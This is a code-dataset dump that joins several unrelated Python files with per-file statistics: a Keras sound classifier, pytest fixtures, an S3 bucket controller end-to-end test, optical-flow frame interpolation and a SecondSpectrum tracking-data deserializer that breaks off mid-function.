plt.plot(np.arange(0, epochs), train_log.history["loss"], label="train_loss")
plt.plot(np.arange(0, epochs), train_log.history["val_loss"], label="val_loss")
plt.plot(np.arange(0, epochs), train_log.history["acc"], label="train_acc")
plt.plot(np.arange(0, epochs), train_log.history["val_acc"], label="val_acc")
plt.title("Training Loss and Accuracy on sar classifier")
plt.xlabel("Epoch #")
plt.ylabel("Loss/Accuracy")
plt.legend(loc="upper right")
plt.savefig("Loss_Accuracy_alexnet_{:d}e.jpg".format(epochs))
"""
"""第二种方法:训练过程中保留Accuracy和Loss值至csv文件,完成后再读取画图
import pandas as pd
import matplotlib.pyplot as plt
log = pd.read_csv('./log/mix_r40_g800_log_0511160953_300e.csv')
l = list(log['epoch;acc;loss;val_acc;val_loss'])
epoch = []
acc = []
loss = []
val_acc = []
val_loss = []
for i in range(0,len(l)):
epoch.append(l[i].split(';')[0])
acc.append(l[i].split(';')[1])
loss.append(l[i].split(';')[2])
val_acc.append(l[i].split(';')[3])
val_loss.append(l[i].split(';')[4])
plt.style.use("ggplot") #设置绘图风格
plt.figure(figsize=(15,10)) #设置绘图大小,单位inch
plt.plot(epoch, loss, label="train_loss")
plt.plot(epoch, val_loss, label="val_loss")
plt.plot(epoch, acc, label="train_acc")
plt.plot(epoch, val_acc, label="val_acc")
plt.title("Training Loss and Accuracy on sar classifier")
plt.xlabel("Epoch #")
plt.ylabel("Loss/Accuracy")
plt.legend(loc="upper right")
plt.savefig("Loss_Accuracy_mix_40-800_300e.jpg")
"""
elif task == 'evaluate':
model = load_model('voice_recog_spectrogram_new2.h5')
accuracy = model.evaluate(test_x, test_y, batch_size=1)
print('test loss and accuracy:', accuracy)
elif task == 'predict':
model = load_model('voice_recog_spectrogram_new2.h5')
result = model.predict_on_batch(test_x)
print(result)
# from keras.utils.vis_utils import plot_model
# plot_model(model,to_file="model_1.png",show_shapes=True)
| 35.910663 | 133 | 0.609823 | """
技术要点:1、创建基于声谱图的卷积神经网络模型(十分类),本文件为第五版本
2、三种功能选择:训练并保存模型、评估模型、类别预测
3、三种训练方法:2d卷积、沿时间卷积、沿频率卷积
4、添加了绘制准确率和损失值变化曲线的代码;
5、注释掉早停法代码行;
6、模型训练回调函数改为logs_loss。
改进方面:音频预处理后再训练
运行结果:300轮训练后,准确率可达到84%
准确率和损失值曲线效果较好,其他曲线效果不佳
"""
import numpy as np
from scipy import signal
import scipy.io.wavfile as wav
import os
import time
import sys
from keras.utils.np_utils import to_categorical
import matplotlib.pyplot as plt
# import skimage.io
import platform
import tensorflow as tf
os.environ["CUDA_VISIBLE_DEVICES"] = "1"
config = tf.ConfigProto()
config.gpu_options.allow_growth=True #不全部占满显存, 按需分配
session = tf.Session(config=config)
plt.switch_backend('agg')
a = platform.platform()
if "Windows" in a:
splitchar = "\\"
elif "Linux" in a:
splitchar = "/"
print('\n', a, '\n')
ROOT_DIR = os.path.abspath('.')
wav_path = os.path.join(ROOT_DIR, "ALL_hd_random")
def get_wav_files(wav_path):
wav_files = []
for (dirpath, dirnames, filenames) in os.walk(wav_path):
for filename in filenames:
if filename.endswith('.wav') or filename.endswith('.WAV'):
filename_path = os.sep.join([dirpath, filename])
if os.stat(filename_path).st_size < 240000: # 剔除掉一些小文件
continue
wav_files.append(filename_path)
return wav_files
def data_preprocess(wav_files, number_of_classes):
data_x = []
data_y = []
sample_frequencies = []
segment_times = []
begin_time = time.time()
for i, onewav in enumerate(wav_files):
if i % 5 == 4: # 运行5个路径名后。
gaptime = time.time() - begin_time
percent = float(i) * 100 / len(wav_files)
eta_time = gaptime * 100 / (percent + 0.01) - gaptime
strprogress = "[" + "=" * int(percent // 2) + ">" + "-" * int(50 - percent // 2) + "]"
str_log = ("%.2f %% %s %s/%s \t used:%d s eta:%d s" % (
percent, strprogress, i, len(wav_files), gaptime, eta_time))
sys.stdout.write('\r' + str_log)
elements = onewav.split(splitchar)
for x in elements:
if x == '01 diode':
label = 0
elif x == '02 metalnode':
label = 1
elif x == '03 qiangkaiguan':
label = 2
elif x == '04 mouse':
label = 3
elif x == '05 dianluban':
label = 4
elif x == '06 libattery':
label = 5
elif x == '07 charger':
label = 6
elif x == '08 A-wav':
label = 7
elif x == '09 qiangchazuo':
label = 8
elif x == '10 netport':
label = 9
(rate, data) = wav.read(onewav)
# 注意!考虑到所有音频数据左声道信号非常清晰,而右声道信号很弱很难分辨,因此此处仅采用左声道的数据
data = np.transpose(data)[0]
'''正向取3秒:
for j in range(len(data)): # len(aud)是统计出二元数组aud的行数,len(aud[0])则是统计数组列数。如果多维,每一维是len(A[i])。
if data[j] > 10 or data[j] < -10:
data = data[j:j + 132400].copy()
break
'''
'''反向取3.5秒:'''
data = data[-154450:-1].copy()
sample_frequency, segment_time, spectrogram = signal.spectrogram(data)
sample_frequencies.append(sample_frequency)
segment_times.append(segment_time)
data_x.append(spectrogram)
data_y.append(label)
# len_freq = []
# len_time = []
# for i in sample_frequencies:
# len_freq.append(len(i))
# for i in segment_times:
# len_time.append(len(i))
#print("\n")
#print(max(len_freq), min(len_freq), max(len_time), min(len_time))
# train_x = np.asarray(train_x)
# train_y = np.asarray(train_y)
max_freq = sample_frequencies[0]
max_time = segment_times[0]
#data_x = [np.concatenate([i, np.zeros((max_freq, max_time - i.shape[1]))], axis=1) for i in data_x]
aaa=np.shape(data_x[0])
data_x = np.array(data_x)
print("\n")
data_x = np.transpose(data_x, axes=(0, 2, 1))
# data_x=np.expand_dims(data_x,axis=3)
data_y = to_categorical(data_y, num_classes=number_of_classes)
return data_x, data_y, max_freq, max_time
##########################################################################
##########################################################################
number_of_classes = 10
# 读取文件
train_files = get_wav_files(os.path.join(wav_path, "train"))
test_files = get_wav_files(os.path.join(wav_path, "test"))
# 数据预处理
train_x, train_y, max_freq, max_time = data_preprocess(train_files, number_of_classes)
test_x, test_y, max_freq, max_time = data_preprocess(test_files, number_of_classes)
import random
randnum = random.randint(0, 100)
random.seed(randnum)
random.shuffle(train_x)
random.seed(randnum)
random.shuffle(train_y)
from keras.models import Sequential, load_model
from keras.layers import MaxPool1D, Conv1D, Conv2D, MaxPool2D, Flatten, Dense, BatchNormalization, Dropout
from keras.callbacks import EarlyStopping
from keras.optimizers import RMSprop
from keras.metrics import categorical_accuracy
from keras import regularizers
import keras
task = 'train' # train or evaluate or predict
if task == 'train':
model = Sequential()
# model.add(Conv2D(filters=16,kernel_size=(3,3), input_shape=(max_time,max_freq,1),activation='relu'))
# model.add(BatchNormalization())
# model.add(MaxPool2D(pool_size=(2,2)))
# model.add(Conv2D(filters=8,kernel_size=(3,3),activation='relu'))
# model.add(BatchNormalization())
# model.add(MaxPool2D(pool_size=(2,2)))
# model.add(Conv2D(filters=4,kernel_size=(3,3),activation='relu'))
# model.add(BatchNormalization())
# model.add(MaxPool2D(pool_size=(2,2)))
# model.add(Flatten())
# #model.add(Dropout(0.5))
# model.add(Dense(128, activation='relu'))
# #model.add(Dropout(0.5))
# model.add(Dense(number_of_classes, activation='softmax'))
model.add(Conv1D(max_freq, 10, input_shape=(max_time, max_freq), activation='relu'))
model.add(BatchNormalization())
model.add(MaxPool1D(4))
model.add(Conv1D(max_freq, 4, activation='relu'))
model.add(BatchNormalization())
model.add(MaxPool1D(4))
model.add(Flatten())
model.add(Dropout(0.5))
model.add(Dense(max_freq, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(number_of_classes, activation='softmax'))
model.compile(loss="categorical_crossentropy", optimizer='adam', metrics=['categorical_accuracy'])
class LossHistory(keras.callbacks.Callback):
# 函数开始时创建盛放loss与acc的容器
def on_train_begin(self, logs={}):
self.losses = {'batch': [], 'epoch': []}
self.accuracy = {'batch': [], 'epoch': []}
self.val_loss = {'batch': [], 'epoch': []}
self.val_acc = {'batch': [], 'epoch': []}
# 按照batch来进行追加数据
def on_batch_end(self, batch, logs={}):
# 每一个batch完成后向容器里面追加loss,acc
self.losses['batch'].append(logs.get('loss'))
self.accuracy['batch'].append(logs.get('acc'))
self.val_loss['batch'].append(logs.get('val_loss'))
self.val_acc['batch'].append(logs.get('val_acc'))
# 每五秒按照当前容器里的值来绘图
if int(time.time()) % 5 == 0:
self.draw_p(self.losses['batch'], 'loss', 'train_batch')
self.draw_p(self.accuracy['batch'], 'acc', 'train_batch')
self.draw_p(self.val_loss['batch'], 'loss', 'val_batch')
self.draw_p(self.val_acc['batch'], 'acc', 'val_batch')
def on_epoch_end(self, batch, logs={}):
# 每一个epoch完成后向容器里面追加loss,acc
self.losses['epoch'].append(logs.get('loss'))
self.accuracy['epoch'].append(logs.get('acc'))
self.val_loss['epoch'].append(logs.get('val_loss'))
self.val_acc['epoch'].append(logs.get('val_acc'))
# 每五秒按照当前容器里的值来绘图
if int(time.time()) % 5 == 0:
self.draw_p(self.losses['epoch'], 'loss', 'train_epoch')
self.draw_p(self.accuracy['epoch'], 'acc', 'train_epoch')
self.draw_p(self.val_loss['epoch'], 'loss', 'val_epoch')
self.draw_p(self.val_acc['epoch'], 'acc', 'val_epoch')
# 绘图,这里把每一种曲线都单独绘图,若想把各种曲线绘制在一张图上的话可修改此方法
def draw_p(self, lists, label, type):
plt.figure()
plt.plot(range(len(lists)), lists, 'r', label=label)
plt.ylabel(label)
plt.xlabel(type)
plt.legend(loc="upper right")
plt.savefig(type + '_' + label + '.jpg')
# 由于这里的绘图设置的是5s绘制一次,当训练结束后得到的图可能不是一个完整的训练过程
# (最后一次绘图结束,又训练了0-5秒的时间)
# 所以这里的方法会在整个训练结束以后调用
def end_draw(self):
self.draw_p(self.losses['batch'], 'loss', 'train_batch')
self.draw_p(self.accuracy['batch'], 'acc', 'train_batch')
self.draw_p(self.val_loss['batch'], 'loss', 'val_batch')
self.draw_p(self.val_acc['batch'], 'acc', 'val_batch')
self.draw_p(self.losses['epoch'], 'loss', 'train_epoch')
self.draw_p(self.accuracy['epoch'], 'acc', 'train_epoch')
self.draw_p(self.val_loss['epoch'], 'loss', 'val_epoch')
self.draw_p(self.val_acc['epoch'], 'acc', 'val_epoch')
logs_loss = LossHistory()
# model=load_model('voice_recog_spectrogram_new1.h5')
# print(model.summary())
# model.pop()
# model.add(Dense(number_of_classes, activation='softmax',name='output'))
# model.compile(loss="categorical_crossentropy", optimizer='adam', metrics=[categorical_accuracy])
# early_stopping = EarlyStopping(monitor='val_loss', patience=10)
model.fit(train_x, train_y, batch_size=20, epochs=300, validation_split=0.1, callbacks=[logs_loss]) # callbacks=[early_stopping]
# 保存模型。
model.save('voice_recog_spectrogram_preprcsess_300epochs_04.h5')
logs_loss.end_draw()
"""第一种方法:训练完成时直接绘制acc和loss变化曲线
train_log = model.fit_generator(train_generator,
steps_per_epoch = nb_train_samples// batch_size,
epochs = epochs,
validation_data = validation_generator,
validation_steps =nb_validation_samples // batch_size,
)
# plot the training loss and accuracy
plt.style.use("ggplot")
plt.figure()
plt.plot(np.arange(0, epochs), train_log.history["loss"], label="train_loss")
plt.plot(np.arange(0, epochs), train_log.history["val_loss"], label="val_loss")
plt.plot(np.arange(0, epochs), train_log.history["acc"], label="train_acc")
plt.plot(np.arange(0, epochs), train_log.history["val_acc"], label="val_acc")
plt.title("Training Loss and Accuracy on sar classifier")
plt.xlabel("Epoch #")
plt.ylabel("Loss/Accuracy")
plt.legend(loc="upper right")
plt.savefig("Loss_Accuracy_alexnet_{:d}e.jpg".format(epochs))
"""
"""第二种方法:训练过程中保留Accuracy和Loss值至csv文件,完成后再读取画图
import pandas as pd
import matplotlib.pyplot as plt
log = pd.read_csv('./log/mix_r40_g800_log_0511160953_300e.csv')
l = list(log['epoch;acc;loss;val_acc;val_loss'])
epoch = []
acc = []
loss = []
val_acc = []
val_loss = []
for i in range(0,len(l)):
epoch.append(l[i].split(';')[0])
acc.append(l[i].split(';')[1])
loss.append(l[i].split(';')[2])
val_acc.append(l[i].split(';')[3])
val_loss.append(l[i].split(';')[4])
plt.style.use("ggplot") #设置绘图风格
plt.figure(figsize=(15,10)) #设置绘图大小,单位inch
plt.plot(epoch, loss, label="train_loss")
plt.plot(epoch, val_loss, label="val_loss")
plt.plot(epoch, acc, label="train_acc")
plt.plot(epoch, val_acc, label="val_acc")
plt.title("Training Loss and Accuracy on sar classifier")
plt.xlabel("Epoch #")
plt.ylabel("Loss/Accuracy")
plt.legend(loc="upper right")
plt.savefig("Loss_Accuracy_mix_40-800_300e.jpg")
"""
elif task == 'evaluate':
model = load_model('voice_recog_spectrogram_new2.h5')
accuracy = model.evaluate(test_x, test_y, batch_size=1)
print('test loss and accuracy:', accuracy)
elif task == 'predict':
model = load_model('voice_recog_spectrogram_new2.h5')
result = model.predict_on_batch(test_x)
print(result)
# from keras.utils.vis_utils import plot_model
# plot_model(model,to_file="model_1.png",show_shapes=True)
| 5,976 | 23 | 224 |
e25bf8be3fd6bade037eaf4f8cc3eb38deb9550a | 470 | py | Python | tests/fixtures/device.py | jspaaks/vak | 581ec4869d342e5d52bc057de54c10901f06d343 | [
"BSD-3-Clause"
] | 26 | 2019-03-04T20:08:57.000Z | 2022-01-22T13:40:00.000Z | tests/fixtures/device.py | jspaaks/vak | 581ec4869d342e5d52bc057de54c10901f06d343 | [
"BSD-3-Clause"
] | 379 | 2019-03-03T12:16:05.000Z | 2022-03-29T13:44:46.000Z | tests/fixtures/device.py | jspaaks/vak | 581ec4869d342e5d52bc057de54c10901f06d343 | [
"BSD-3-Clause"
] | 12 | 2019-11-22T21:19:19.000Z | 2022-03-14T17:44:59.000Z | import pytest
import torch
DEVICES = ["cpu"]
if torch.cuda.is_available():
DEVICES.append("cuda")
@pytest.fixture(params=DEVICES)
def device(request):
"""parametrized device function,
that returns string names of the devices
that ``torch`` considers "available".
causes any test using ``device`` fixture to run just once
if only a cpu is available,
and twice if ``torch.cuda.is_available()`` returns ``True``."""
return request.param
| 24.736842 | 67 | 0.695745 | import pytest
import torch
DEVICES = ["cpu"]
if torch.cuda.is_available():
DEVICES.append("cuda")
@pytest.fixture(params=DEVICES)
def device(request):
"""parametrized device function,
that returns string names of the devices
that ``torch`` considers "available".
causes any test using ``device`` fixture to run just once
if only a cpu is available,
and twice if ``torch.cuda.is_available()`` returns ``True``."""
return request.param
| 0 | 0 | 0 |
aadeedeee12237575f8cdcec6f32a2ad4677f9c5 | 11,329 | py | Python | test/e2e/tests/test_bucket.py | vijtrip2/s3-controller | b1a21ab237746646255b78412bcbfcd249b72f61 | [
"Apache-2.0"
] | null | null | null | test/e2e/tests/test_bucket.py | vijtrip2/s3-controller | b1a21ab237746646255b78412bcbfcd249b72f61 | [
"Apache-2.0"
] | null | null | null | test/e2e/tests/test_bucket.py | vijtrip2/s3-controller | b1a21ab237746646255b78412bcbfcd249b72f61 | [
"Apache-2.0"
] | null | null | null | # Copyright Amazon.com Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may
# not use this file except in compliance with the License. A copy of the
# License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
"""Integration tests for the S3 Bucket API.
"""
import pytest
import time
import logging
import re
from typing import Generator
from dataclasses import dataclass
from acktest.resources import random_suffix_name
from acktest.k8s import resource as k8s
from e2e import service_marker, CRD_GROUP, CRD_VERSION, load_s3_resource
from e2e.replacement_values import REPLACEMENT_VALUES
from e2e.bootstrap_resources import BootstrapResources, get_bootstrap_resources
RESOURCE_PLURAL = "buckets"
CREATE_WAIT_AFTER_SECONDS = 10
MODIFY_WAIT_AFTER_SECONDS = 10
DELETE_WAIT_AFTER_SECONDS = 10
@dataclass
@pytest.fixture(scope="function")
@service_marker | 38.016779 | 109 | 0.713655 | # Copyright Amazon.com Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may
# not use this file except in compliance with the License. A copy of the
# License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
"""Integration tests for the S3 Bucket API.
"""
import pytest
import time
import logging
import re
from typing import Generator
from dataclasses import dataclass
from acktest.resources import random_suffix_name
from acktest.k8s import resource as k8s
from e2e import service_marker, CRD_GROUP, CRD_VERSION, load_s3_resource
from e2e.replacement_values import REPLACEMENT_VALUES
from e2e.bootstrap_resources import BootstrapResources, get_bootstrap_resources
RESOURCE_PLURAL = "buckets"
CREATE_WAIT_AFTER_SECONDS = 10
MODIFY_WAIT_AFTER_SECONDS = 10
DELETE_WAIT_AFTER_SECONDS = 10
@dataclass
class Bucket:
ref: k8s.CustomResourceReference
resource_name: str
resource_data: str
def get_bucket(s3_resource, bucket_name: str):
return s3_resource.Bucket(bucket_name)
def bucket_exists(s3_client, bucket: Bucket) -> bool:
try:
resp = s3_client.list_buckets()
except Exception as e:
logging.debug(e)
return False
buckets = resp["Buckets"]
for _bucket in buckets:
if _bucket["Name"] == bucket.resource_name:
return True
return False
def load_bucket_resource(resource_file_name: str, resource_name: str):
replacements = REPLACEMENT_VALUES.copy()
replacements["BUCKET_NAME"] = resource_name
resource_data = load_s3_resource(
resource_file_name,
additional_replacements=replacements,
)
logging.debug(resource_data)
return resource_data
def create_bucket(resource_file_name: str) -> Bucket:
resource_name = random_suffix_name("s3-bucket", 24)
resource_data = load_bucket_resource(resource_file_name, resource_name)
logging.info(f"Creating bucket {resource_name}")
# Create k8s resource
ref = k8s.CustomResourceReference(
CRD_GROUP, CRD_VERSION, RESOURCE_PLURAL,
resource_name, namespace="default",
)
resource_data = k8s.create_custom_resource(ref, resource_data)
k8s.wait_resource_consumed_by_controller(ref)
time.sleep(CREATE_WAIT_AFTER_SECONDS)
return Bucket(ref, resource_name, resource_data)
def replace_bucket_spec(bucket: Bucket, resource_file_name: str):
resource_data = load_bucket_resource(resource_file_name, bucket.resource_name)
# Fetch latest version before patching
bucket.resource_data = k8s.get_resource(bucket.ref)
bucket.resource_data["spec"] = resource_data["spec"]
bucket.resource_data = k8s.replace_custom_resource(bucket.ref, bucket.resource_data)
time.sleep(MODIFY_WAIT_AFTER_SECONDS)
def delete_bucket(bucket: Bucket):
# Delete k8s resource
_, deleted = k8s.delete_custom_resource(bucket.ref)
assert deleted is True
time.sleep(DELETE_WAIT_AFTER_SECONDS)
@pytest.fixture(scope="function")
def basic_bucket(s3_client) -> Generator[Bucket, None, None]:
bucket = None
try:
bucket = create_bucket("bucket")
assert k8s.get_resource_exists(bucket.ref)
exists = bucket_exists(s3_client, bucket)
assert exists
except:
if bucket is not None:
delete_bucket(bucket)
return pytest.fail("Bucket failed to create")
yield bucket
delete_bucket(bucket)
exists = bucket_exists(s3_client, bucket)
assert not exists
@service_marker
class TestBucket:
def test_basic(self, basic_bucket):
# Existance assertions are handled by the fixture
assert basic_bucket
def test_put_fields(self, s3_client, s3_resource, basic_bucket):
self._update_assert_accelerate(basic_bucket, s3_client)
self._update_assert_cors(basic_bucket, s3_resource)
self._update_assert_encryption(basic_bucket, s3_client)
self._update_assert_lifecycle(basic_bucket, s3_resource)
self._update_assert_logging(basic_bucket, s3_resource)
self._update_assert_notification(basic_bucket, s3_resource)
self._update_assert_ownership_controls(basic_bucket, s3_client)
self._update_assert_policy(basic_bucket, s3_resource)
self._update_assert_replication(basic_bucket, s3_client)
self._update_assert_request_payment(basic_bucket, s3_resource)
self._update_assert_tagging(basic_bucket, s3_resource)
self._update_assert_versioning(basic_bucket, s3_resource)
self._update_assert_website(basic_bucket, s3_resource)
def _update_assert_accelerate(self, bucket: Bucket, s3_client):
replace_bucket_spec(bucket, "bucket_accelerate")
accelerate_configuration = s3_client.get_bucket_accelerate_configuration(Bucket=bucket.resource_name)
desired = bucket.resource_data["spec"]["accelerate"]
latest = accelerate_configuration
assert desired["status"] == latest["Status"]
def _update_assert_cors(self, bucket: Bucket, s3_resource):
replace_bucket_spec(bucket, "bucket_cors")
latest = get_bucket(s3_resource, bucket.resource_name)
cors = latest.Cors()
desired_rule = bucket.resource_data["spec"]["cors"]["corsRules"][0]
latest_rule = cors.cors_rules[0]
assert desired_rule.get("allowedMethods", []) == latest_rule.get("AllowedMethods", [])
assert desired_rule.get("allowedOrigins", []) == latest_rule.get("AllowedOrigins", [])
assert desired_rule.get("allowedHeaders", []) == latest_rule.get("AllowedHeaders", [])
assert desired_rule.get("exposeHeaders", []) == latest_rule.get("ExposeHeaders", [])
def _update_assert_encryption(self, bucket: Bucket, s3_client):
replace_bucket_spec(bucket, "bucket_encryption")
encryption = s3_client.get_bucket_encryption(Bucket=bucket.resource_name)
desired_rule = bucket.resource_data["spec"]["encryption"]["rules"][0]
latest_rule = encryption["ServerSideEncryptionConfiguration"]["Rules"][0]
assert desired_rule["applyServerSideEncryptionByDefault"]["sseAlgorithm"] == \
latest_rule["ApplyServerSideEncryptionByDefault"]["SSEAlgorithm"]
def _update_assert_lifecycle(self, bucket: Bucket, s3_resource):
replace_bucket_spec(bucket, "bucket_lifecycle")
latest = get_bucket(s3_resource, bucket.resource_name)
request_payment = latest.LifecycleConfiguration()
desired_rule = bucket.resource_data["spec"]["lifecycle"]["rules"][0]
latest_rule = request_payment.rules[0]
assert desired_rule["id"] == latest_rule["ID"]
assert desired_rule["status"] == latest_rule["Status"]
def _update_assert_logging(self, bucket: Bucket, s3_resource):
replace_bucket_spec(bucket, "bucket_logging")
latest = get_bucket(s3_resource, bucket.resource_name)
logging = latest.Logging()
desired = bucket.resource_data["spec"]["logging"]["loggingEnabled"]
latest = logging.logging_enabled
assert desired["targetBucket"] == latest["TargetBucket"]
assert desired["targetPrefix"] == latest["TargetPrefix"]
def _update_assert_notification(self, bucket: Bucket, s3_resource):
replace_bucket_spec(bucket, "bucket_notification")
latest = get_bucket(s3_resource, bucket.resource_name)
notification = latest.Notification()
desired_config = bucket.resource_data["spec"]["notification"]["topicConfigurations"][0]
latest_config = notification.topic_configurations[0]
assert desired_config["id"] == latest_config["Id"]
assert desired_config["topicARN"] == latest_config["TopicArn"]
def _update_assert_ownership_controls(self, bucket: Bucket, s3_client):
replace_bucket_spec(bucket, "bucket_ownership_controls")
ownership_controls = s3_client.get_bucket_ownership_controls(Bucket=bucket.resource_name)
desired_rule = bucket.resource_data["spec"]["ownershipControls"]["rules"][0]
latest_rule = ownership_controls["OwnershipControls"]["Rules"][0]
assert desired_rule["objectOwnership"] == latest_rule["ObjectOwnership"]
def _update_assert_policy(self, bucket: Bucket, s3_resource):
replace_bucket_spec(bucket, "bucket_policy")
latest = get_bucket(s3_resource, bucket.resource_name)
policy = latest.Policy()
# Strip any whitespace from between the two
desired = re.sub(r"\s+", "", bucket.resource_data["spec"]["policy"], flags=re.UNICODE)
latest = re.sub(r"\s+", "", policy.policy, flags=re.UNICODE)
assert desired == latest
def _update_assert_replication(self, bucket: Bucket, s3_client):
replace_bucket_spec(bucket, "bucket_replication")
replication = s3_client.get_bucket_replication(Bucket=bucket.resource_name)
desired = bucket.resource_data["spec"]["replication"]
latest = replication["ReplicationConfiguration"]
desired_rule = desired["rules"][0]
latest_rule = latest["Rules"][0]
assert desired["role"] == latest["Role"]
assert desired_rule["id"] == latest_rule["ID"]
assert desired_rule["destination"]["bucket"] == latest_rule["Destination"]["Bucket"]
def _update_assert_request_payment(self, bucket: Bucket, s3_resource):
replace_bucket_spec(bucket, "bucket_request_payment")
latest = get_bucket(s3_resource, bucket.resource_name)
request_payment = latest.RequestPayment()
desired = bucket.resource_data["spec"]["requestPayment"]["payer"]
latest = request_payment.payer
assert desired == latest
def _update_assert_tagging(self, bucket: Bucket, s3_resource):
replace_bucket_spec(bucket, "bucket_tagging")
latest = get_bucket(s3_resource, bucket.resource_name)
tagging = latest.Tagging()
desired = bucket.resource_data["spec"]["tagging"]["tagSet"]
latest = tagging.tag_set
for i in range(2):
assert desired[i]["key"] == latest[i]["Key"]
assert desired[i]["value"] == latest[i]["Value"]
def _update_assert_versioning(self, bucket: Bucket, s3_resource):
replace_bucket_spec(bucket, "bucket_versioning")
latest = get_bucket(s3_resource, bucket.resource_name)
versioning = latest.Versioning()
desired = bucket.resource_data["spec"]["versioning"]["status"]
latest = versioning.status
assert desired == latest
def _update_assert_website(self, bucket: Bucket, s3_resource):
replace_bucket_spec(bucket, "bucket_website")
latest = get_bucket(s3_resource, bucket.resource_name)
website = latest.Website()
desired = bucket.resource_data["spec"]["website"]
latest = website
assert desired["errorDocument"]["key"] == latest.error_document["Key"]
assert desired["indexDocument"]["suffix"] == latest.index_document["Suffix"] | 9,446 | 71 | 608 |
4653c46601b0d10d1b8237b0bec1d4bfbfd387d8 | 987 | py | Python | finetuned/sphere.py | vineeths96/Video-Interpolation-using-Deep-Optical-Flow | 5dd536bcc2d6c0d0d1718dccb09eb71ca77d2d94 | [
"MIT"
] | 5 | 2021-04-17T15:26:29.000Z | 2021-10-11T13:17:56.000Z | finetuned/sphere.py | vineeths96/Video-Interpolation-using-Deep-Optical-Flow | 5dd536bcc2d6c0d0d1718dccb09eb71ca77d2d94 | [
"MIT"
] | null | null | null | finetuned/sphere.py | vineeths96/Video-Interpolation-using-Deep-Optical-Flow | 5dd536bcc2d6c0d0d1718dccb09eb71ca77d2d94 | [
"MIT"
] | 2 | 2021-11-28T06:40:23.000Z | 2022-01-17T12:20:21.000Z | import glob
import cv2
import regex as re
from .deep_optical_flow import deep_optical_flow
from .interpolations import warp_flow
from .parameters import *
def sphere_interpolation(model_path="./flownet2/pretrained_models/FlowNet2_checkpoint.pth.tar"):
"""
Sphere dataset interpolation of Frame N+1 from Frame N and Frame N+2
:param model_path: Path to pretrained optical flow model
:return: None
"""
images = glob.glob("./input/sphere/*.ppm")
images.sort(key=lambda f: int(re.sub("\D", "", f)))
for ind in range(0, len(images) - 2, 2):
firstImage = cv2.imread(images[ind])
secondImage = cv2.imread(images[ind + 2])
forward_flow, If = deep_optical_flow(model_path, firstImage, secondImage, LR, NUM_ITER, ind, "sphere")
backward_flow, Ib = deep_optical_flow(model_path, secondImage, firstImage, LR, NUM_ITER, ind, "sphere")
warp_flow(firstImage, secondImage, forward_flow, If, backward_flow, Ib, ind, "sphere")
| 36.555556 | 111 | 0.707194 | import glob
import cv2
import regex as re
from .deep_optical_flow import deep_optical_flow
from .interpolations import warp_flow
from .parameters import *
def sphere_interpolation(model_path="./flownet2/pretrained_models/FlowNet2_checkpoint.pth.tar"):
"""
Sphere dataset interpolation of Frame N+1 from Frame N and Frame N+2
:param model_path: Path to pretrained optical flow model
:return: None
"""
images = glob.glob("./input/sphere/*.ppm")
images.sort(key=lambda f: int(re.sub("\D", "", f)))
for ind in range(0, len(images) - 2, 2):
firstImage = cv2.imread(images[ind])
secondImage = cv2.imread(images[ind + 2])
forward_flow, If = deep_optical_flow(model_path, firstImage, secondImage, LR, NUM_ITER, ind, "sphere")
backward_flow, Ib = deep_optical_flow(model_path, secondImage, firstImage, LR, NUM_ITER, ind, "sphere")
warp_flow(firstImage, secondImage, forward_flow, If, backward_flow, Ib, ind, "sphere")
| 0 | 0 | 0 |
875c50a031df3d5ca588d2664761bc39b8ece01c | 9,363 | py | Python | kloppy/infra/serializers/tracking/secondspectrum.py | benoitblanc/kloppy | 5c3f94ff8806f9e23f8bad095a948a403a06a54c | [
"BSD-3-Clause"
] | null | null | null | kloppy/infra/serializers/tracking/secondspectrum.py | benoitblanc/kloppy | 5c3f94ff8806f9e23f8bad095a948a403a06a54c | [
"BSD-3-Clause"
] | null | null | null | kloppy/infra/serializers/tracking/secondspectrum.py | benoitblanc/kloppy | 5c3f94ff8806f9e23f8bad095a948a403a06a54c | [
"BSD-3-Clause"
] | null | null | null | import json
import logging
from typing import Tuple, Dict, Optional, Union, NamedTuple, IO
from lxml import objectify
from kloppy.domain import (
TrackingDataset,
DatasetFlag,
AttackingDirection,
Frame,
Point,
Point3D,
Team,
BallState,
Period,
Provider,
Orientation,
attacking_direction_from_frame,
Metadata,
Ground,
Player,
build_coordinate_system,
Provider,
Transformer,
PlayerData,
)
from kloppy.utils import Readable, performance_logging
from .deserializer import TrackingDataDeserializer
logger = logging.getLogger(__name__)
| 35.736641 | 109 | 0.522162 | import json
import logging
from typing import Tuple, Dict, Optional, Union, NamedTuple, IO
from lxml import objectify
from kloppy.domain import (
TrackingDataset,
DatasetFlag,
AttackingDirection,
Frame,
Point,
Point3D,
Team,
BallState,
Period,
Provider,
Orientation,
attacking_direction_from_frame,
Metadata,
Ground,
Player,
build_coordinate_system,
Provider,
Transformer,
PlayerData,
)
from kloppy.utils import Readable, performance_logging
from .deserializer import TrackingDataDeserializer
logger = logging.getLogger(__name__)
class SecondSpectrumInputs(NamedTuple):
meta_data: IO[bytes]
raw_data: IO[bytes]
additional_meta_data: Optional[IO[bytes]] = None
class SecondSpectrumDeserializer(
TrackingDataDeserializer[SecondSpectrumInputs]
):
def __init__(
self,
limit: Optional[int] = None,
sample_rate: Optional[float] = None,
coordinate_system: Optional[Union[str, Provider]] = None,
only_alive: Optional[bool] = True,
):
super().__init__(limit, sample_rate, coordinate_system)
self.only_alive = only_alive
@property
def provider(self) -> Provider:
return Provider.SECONDSPECTRUM
@classmethod
def _frame_from_framedata(cls, teams, period, frame_data):
frame_id = frame_data["frameIdx"]
frame_timestamp = frame_data["gameClock"]
ball_x, ball_y, ball_z = frame_data["ball"]["xyz"]
ball_state = BallState.ALIVE if frame_data["live"] else BallState.DEAD
ball_owning_team = (
teams[0] if frame_data["lastTouch"] == "home" else teams[1]
)
players_data = {}
for team, team_str in zip(teams, ["homePlayers", "awayPlayers"]):
for player_data in frame_data[team_str]:
jersey_no = player_data["number"]
